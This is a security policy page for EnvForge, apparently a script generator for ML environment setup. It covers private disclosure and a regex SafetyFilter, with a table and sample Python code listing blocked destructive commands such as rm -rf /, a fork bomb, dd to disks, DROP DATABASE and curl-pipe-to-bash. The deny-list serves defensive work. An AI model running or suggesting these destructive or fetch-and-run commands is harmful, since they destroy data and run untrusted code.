Deterministic logic > AI generation. Because EnvForge generates scripts that run on user systems, we take security exceptionally seriously.
EnvForge provides security updates for the following versions:
| Version | Supported | Notes |
|---|---|---|
| 0.2.x | ✅ | Currently in active development |
| 0.1.x | ❌ | Alpha release, no longer maintained |
If you discover a security vulnerability in the backend API, template engine, or CLI agent, please report it to us privately.
DO NOT open a public GitHub issue for security vulnerabilities.
Instead, please email rishabh0510@gmail.com with:
- A description of the vulnerability.
- Steps to reproduce the issue.
- The affected versions or components (e.g., `TemplateRenderer`, `envforge-agent`).
- Any potential mitigations you suggest.
EnvForge explicitly forbids the generation of dangerous shell commands. Every generated script passes through a strict SafetyFilter. We consider any bypass of this filter a critical security vulnerability.
Prohibited commands include, but are not limited to:
- Recursive directory deletion (`rm -rf /`, `rm -rf $HOME`)
- Filesystem formatting (`mkfs`, `format C:`)
- Raw disk writing (`dd`)
- System shutdown or reboot commands
- Database drop commands (`DROP TABLE`, `DROP DATABASE`)
For full details, read our Script Safety Policy.
EnvForge is designed to provision and repair, not to blindly destroy.
- We do not generate scripts that automatically uninstall GPU drivers.
- We do not generate scripts that forcefully delete Python environments without explicit user consent.
- All repair scripts must be auditable plain-text files.
We encourage users to test generated scripts inside Docker containers or isolated WSL environments whenever possible. We explicitly provide a Dockerfile output format for every profile to support this sandboxed approach.
Every script generated by EnvForge is validated by the `SafetyFilter` in `backend/app/templates/safety.py` before being returned to the client. The enforced safety gate in normal rendering is the regex-based validation step. An additional AI audit path exists, but it is optional and only runs when an `llm_client` is explicitly supplied.
Stage 1 — Regex Pattern Matching
The full rendered script is scanned against a list of compiled regular expressions. Matching is case-insensitive and dot-all (the `.` wildcard spans newlines). If any pattern matches, a `SafetyViolationError` is raised immediately and the script is rejected; it is never returned to the user.
Stage 2 — Optional AI Auditor
When an LLM provider is configured, the full script is additionally sent to the LLM acting as a strict Linux security auditor. If the AI flags the script as unsafe, it is rejected with the AI's stated reason. This stage is best-effort — if the LLM provider is unavailable, it is skipped and Stage 1 alone applies.
The following table lists each blocked category, the commands its pattern matches (in plain English), and why it is dangerous.
| # | Category | What It Matches | Why It Is Blocked |
|---|---|---|---|
| 1 | Root filesystem deletion | `rm -rf /` or `rm -Rf /` (only when the `/` is not followed by a word character) | Irreversibly wipes the entire filesystem from the root downward |
| 2 | Home directory deletion (variable) | `rm -rf $HOME` | Destroys the user's entire home directory via the `$HOME` environment variable |
| 3 | Home directory deletion (tilde) | `rm -rf ~` | Same as above, using the tilde shorthand for the home directory |
| 4 | Filesystem formatting | `mkfs.ext4`, `mkfs.vfat`, any `mkfs.*` variant | Formats a disk partition, erasing all data on it |
| 5 | Windows drive formatting | `format C:`, `format D:`, etc. | Formats a Windows drive letter, causing total data loss |
| 6 | Fork bomb | `: () { : \| : & }; :`, the classic process-exhaustion pattern | Spawns processes exponentially until the system runs out of resources and crashes |
| 7 | Raw disk write | `dd if=` | Writes raw data directly to a disk device, bypassing the filesystem; can corrupt or destroy an entire drive |
| 8 | Direct disk write via redirect | `> /dev/sda`, `> /dev/sdb`, etc. | Overwrites a raw block device directly from the shell, destroying its contents |
| 9 | System shutdown or reboot | `shutdown /s`, `shutdown /r`, `shutdown -h`, `shutdown -r` | Halts or reboots the system, terminating all running processes |
| 10 | SQL database destruction | `DROP DATABASE` | Permanently deletes an entire database and all its data |
| 11 | SQL table destruction | `DROP TABLE` | Permanently deletes a database table and all its rows |
| 12 | SQL table truncation | `TRUNCATE TABLE` | Removes all rows from a table instantly and irreversibly |
| 13 | Curl-pipe-to-shell | `curl <url> \| bash`, `curl <url> \| sh` | Downloads and executes arbitrary remote code without review; a common supply-chain attack vector |
| 14 | Wget-pipe-to-shell | `wget -O- <url> \| bash` | Same risk as curl-pipe-to-shell, using wget as the downloader |
| 15 | Eval of subshell output | `eval $(...)` | Executes dynamically constructed shell commands; easily abused to run hidden payloads |
| 16 | Base64 decode pipe to shell | `base64 --decode \| sh` | Decodes and executes obfuscated shell commands; a common technique for hiding malicious payloads |
Regex allows fast, stateless scanning of the entire rendered shell script output without executing it. Key properties of the implementation:
- Case-insensitive (`re.IGNORECASE`): catches `RM -RF`, `Rm -Rf`, etc.
- Dot-all mode (`re.DOTALL`): the `.` wildcard in a pattern also matches newlines, so a pipeline broken across lines is still caught.
- Compiled at startup: all patterns are pre-compiled once when the module loads, keeping per-request overhead negligible.
- Fail-closed: any pattern match raises an exception and blocks the script; there is no fallback that permits the output.
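The two-stage gate described above (regex first, optional LLM audit second) and the properties in this list, written out as a runnable example. This is illustrative code added here, not EnvForge's own `backend/app/templates/safety.py`: the exact regexes, the `blocked_category`/`is_rejected` helpers, the `llm_client` call shape (a callable that takes the prompt text and returns a verdict string starting with `SAFE` or `UNSAFE`) and the sample script are all assumptions made for this example. The patterns follow the categories in the table, with one small generalisation: category 8 also covers `/dev/nvme*` devices.

```python
import re
from typing import Callable, Optional


class SafetyViolationError(Exception):
    """Raised when a rendered script is rejected; the script is never returned."""


# (category, regex) in table order. Regex wording is this example's own, not
# the project's. Compiled once in SafetyFilter.__init__, not per request.
_BLOCKED_PATTERNS = [
    # `/` must not be followed by a word character, so `rm -rf /tmp/build` passes.
    ("root filesystem deletion", r"\brm\s+-rf\s+/(?!\w)"),
    # `$HOME` / `~` on their own or as `$HOME/*`; sub-paths such as ~/.cache pass.
    ("home directory deletion", r"\brm\s+-rf\s+(?:\$HOME|~)(?:/\*)?(?![\w/.])"),
    ("filesystem formatting", r"\bmkfs(?:\.\w+)?\b"),
    ("Windows drive formatting", r"\bformat\s+[a-z]:"),
    ("fork bomb", r":\s*\(\s*\)\s*\{\s*:\s*\|\s*:\s*&\s*\}\s*;\s*:"),
    ("raw disk write", r"\bdd\s+if="),
    ("direct disk write via redirect", r">\s*/dev/(?:sd[a-z]|nvme\d)"),  # nvme added
    ("system shutdown or reboot", r"\bshutdown\s+(?:/[sr]|-[hr])\b"),
    ("SQL database destruction", r"\bdrop\s+database\b"),
    ("SQL table destruction", r"\bdrop\s+table\b"),
    ("SQL table truncation", r"\btruncate\s+table\b"),
    # `.*?` under re.DOTALL spans newlines, so a line-wrapped pipeline still matches.
    ("curl piped to shell", r"\bcurl\b.*?\|\s*(?:sudo\s+)?(?:ba)?sh\b"),
    ("wget piped to shell", r"\bwget\b.*?\|\s*(?:sudo\s+)?(?:ba)?sh\b"),
    ("eval of subshell output", r"\beval\s+[\"']?\$\("),
    ("base64 decode piped to shell",
     r"\bbase64\b.*?(?:--decode|-d)\b.*?\|\s*(?:sudo\s+)?(?:ba)?sh\b"),
]

# Assumed prompt shape for the optional auditor; the real wording is not on the page.
AUDIT_PROMPT = ("You are a strict Linux security auditor. Reply SAFE, or "
                "UNSAFE: <reason>, for the following shell script.\n\n")


class SafetyFilter:
    """Stage 1 (regex, always enforced) then Stage 2 (LLM audit, optional)."""

    _FLAGS = re.IGNORECASE | re.DOTALL

    def __init__(self, llm_client: Optional[Callable[[str], str]] = None):
        self._patterns = [(name, re.compile(p, self._FLAGS)) for name, p in _BLOCKED_PATTERNS]
        self._llm_client = llm_client  # assumed shape: prompt text -> verdict text

    def blocked_category(self, script: str) -> Optional[str]:
        """Stage 1 only: name of the first matching category, or None."""
        for name, pattern in self._patterns:
            if pattern.search(script):
                return name
        return None

    def validate(self, script: str) -> str:
        """Return the script unchanged, or raise SafetyViolationError (fail-closed)."""
        category = self.blocked_category(script)
        if category is not None:
            raise SafetyViolationError(f"blocked: {category}")
        if self._llm_client is not None:
            try:
                verdict = self._llm_client(AUDIT_PROMPT + script)
            except Exception:
                return script  # best-effort: provider unavailable, Stage 1 alone applies
            if verdict.strip().upper().startswith("UNSAFE"):
                raise SafetyViolationError(f"AI auditor: {verdict.strip()}")
        return script


_DEFAULT = SafetyFilter()


def blocked_category(script: str) -> Optional[str]:
    return _DEFAULT.blocked_category(script)


def is_rejected(script: str, llm_client: Optional[Callable[[str], str]] = None) -> bool:
    try:
        SafetyFilter(llm_client).validate(script)
    except SafetyViolationError:
        return True
    return False


def unavailable_llm(prompt: str) -> str:
    """Constructed stub standing in for a provider that is down."""
    raise ConnectionError("LLM provider unreachable")


# Constructed sample input resembling a typical ML setup script (not real EnvForge output).
SAFE_SCRIPT = """#!/usr/bin/env bash
set -euo pipefail
python3 -m venv .venv
. .venv/bin/activate
pip install --upgrade pip
pip install torch==2.3.0 --index-url https://download.pytorch.org/whl/cu121
curl -fsSL https://example.invalid/cuda_12.1.run -o cuda_12.1.run
rm -rf build/ .pytest_cache
echo done > setup.log
"""

if __name__ == "__main__":
    print("safe script category:", blocked_category(SAFE_SCRIPT))
    print("line-wrapped curl|bash:",
          blocked_category("curl -fsSL https://example.invalid/x.sh |\n  bash"))
```

The lookahead on category 1 is the part worth testing both ways: `rm -rf /` and `rm -rf /*` are rejected while `rm -rf /tmp/build` passes, which is exactly the boundary a bypass or false-positive report would argue about. Being a deny-list over the rendered text, a filter like this can only reject what it can see, which is why sandboxed testing is recommended alongside it.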
The filter targets destructive and obfuscated operations only. Normal ML environment setup commands are fully permitted, including:
- Package managers: `pip install`, `apt-get install`, `conda install`
- Virtual environment creation: `python -m venv`, `conda create`
- CUDA toolkit and driver installation via official installers
- File writes within project or user directories
- Standard network calls such as `curl` or `wget` when not piped directly to a shell
If you discover a command that should be blocked but is not, please report it privately following the Responsible Disclosure process above rather than opening a public issue. Filter bypass reports are treated as security vulnerabilities.
If a legitimate command is incorrectly blocked (false positive), open a regular GitHub issue describing the command and its intended use case so the pattern can be refined.